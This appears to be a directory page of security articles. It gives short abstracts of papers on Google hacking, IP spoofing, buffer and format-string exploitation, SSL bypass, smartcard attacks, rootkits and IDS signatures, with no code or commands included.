Googling Up Passwords
I'm not putting down Google. Far from it: it's a great search engine, and I use it all the time. I couldn't do my many jobs without Google, so I've spent some time learning how to maximize its value, how to find exactly what I want, how to plumb its depths to find just the right nugget of information that I need. In the same way that Google can be used for good, though, it can also be used by malevolent individuals to root out vulnerabilities, discover passwords and other sensitive data, and in general find out way more about systems than they need to know. And, of course, Google's not the only game in town -- but it is certainly the biggest, the most widely-used, and in many ways the easiest to use.
|
|
IP Spoofing: An Introduction
Criminals have long employed the tactic of masking their true identity, from disguises to aliases to caller-id blocking. It should come as no surprise then, that criminals who conduct their nefarious activities on networks and computers should employ such techniques. IP spoofing is one of the most common forms of on-line camouflage. In IP spoofing, an attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine by "spoofing" the IP address of that machine. In this article, we will examine the concepts of IP spoofing: why it is possible, how it works, what it is used for and how to defend against it.
|
|
Exploitation - Returning into libc
The intention of this article is not to teach you the in's and out's of buffer overflows, but to explain in a little detail another technique used to execute arbitrary code as opposed to the classic 'NOP sled + shellcode + repeated retaddr' method. I assume readers are familiar with buffer overflow vulnerabilities and the basics of how to exploit them. Also a little bit of the theory of memory organization is desirable, such as how the little-endian bit ordering system works. To those who are not familiar with buffer overflow bugs, I suggest you read "Smashing the Stack for Fun and Profit".
|
|
Adjacent Overwrite BUG
This article is meant to be presented as an informative, step by step log of exploiting an adjacent memory overflow. It is aimed at those who have buffer overflow experience, and hopefully have knowledge of the organization of the stack. An article has been posted in phrack magazine with a very good overview and introduction to this topic, I suggest you read that and use this text as a reference to theorys presented.
|
|
|
|
|
|
Stack Overflows
Covers a vulnerability commonly found in the wild: the stack overflow. Explains and provides examples of stack overflows.
|
|
CASR - ACAT: PHP TopSites Vulnerability Report
The purpose of this document is to show several vulnerabilities and provide fixes for the PHP TopSites Pro/Free script. This report is published for educational purposes only. The authors take no responsibility for damage resulting from the misuse of this information. All copyrights are retained by the authors. This information may not be reproduced without prior written consent from the authors.
|
|
Format String Attacks
These slides show a picture of what's happening on the stack during such an attack.
|
|
Improving the Security of Your Site by Breaking Into it
*The early '90s perspective* "In this paper we will take an unusual approach to system security. Instead of merely saying that something is a problem, we will look through the eyes of a potential intruder, and show why it is one..."
|
|
The easiest way to get around SSL
This paper explains how it is often possible, with the simple substitution of a string, to get around a "secure" implementation based on an incorrect use of SSL. Please note that this document does not contain any information about weaknesses of the SSL protocol
|
|
Known Attacks Against Smartcards
This document analyzes, from a technical point of view, currently known attacks against smart card implementations. The purpose of this analysis is to give the necessary background for the assessment of the mechanisms that can enhance the security of smart cards. This document is mainly intended for people who are considering the use of cryptographic modules and who need to compare several options with respect to their security.
|
|
The Art of Rootkits (2nd ed)
A rootkit is a program. Rootkits come in all different shapes and styles, some more advance than others. Rootkits are basically programs that help attackers keep their position as root. Notice it's called a "rootkit". 'root' meaning the highest level of administration on *nix based systems and 'kit' meaning a collection of tools. Rootkits contain tools which help attackers hide their presence as well as give the attacker full control of the server or host continuously without being noticed. Rootkits are usually installed on systems when they have been successfully compromised and the highest level of access has been given (usually root) Some rootkits refuse to be installed until the attacker has root access, due to read and write permission to certain files. Once the system has been successfully compromised and the attacker has root, heshe may then install the rootkit, allowing them to cover their tracks and wipe the log files.
|
|
Hacker Tools and Their Signatures, Part One: bind8x.c
This article is the first in a series of papers detailing hacker exploits/tools and their signatures. This installment will examine the Berkley Internet Name Domain exploit bind8x.c. The discussion will cover the details of bind8x.c and provide signatures that will assist an IDS analyst in detecting it. This paper assumes that the reader has some basic knowledge of TCP/IP and understands the tcpdump format.
|
|
Actions
Category Stats